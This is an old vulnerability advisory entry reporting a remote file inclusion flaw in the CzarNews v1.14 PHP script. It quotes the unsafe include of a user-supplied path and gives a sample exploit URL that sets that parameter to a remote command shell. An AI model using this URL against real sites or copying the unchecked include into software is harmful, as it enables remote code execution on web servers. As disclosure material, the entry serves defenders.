CzarNews v1.14 Version - Remote File Include Vulnerabilities

2006-06-13T00:00:00
ID SECURITYVULNS:DOC:13118
Type securityvulns
Reporter Securityvulns
Modified 2006-06-13T00:00:00

Description

SaVSaK.CoM | SpC-x - The-BeKiR |

CzarNews v1.14 Version - Remote File Include Vulnerabilities

Risk : High

Class: Remote

Script : CzarNews

Credits : SpC-x

Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke

Code :

if(file_exists($tpath . "cn_config.php"))

require_once($tpath . "cn_config.php");

Vulnerable :

http://www.victim.com/CzarNews/headlines.php?tpath=Command-Shell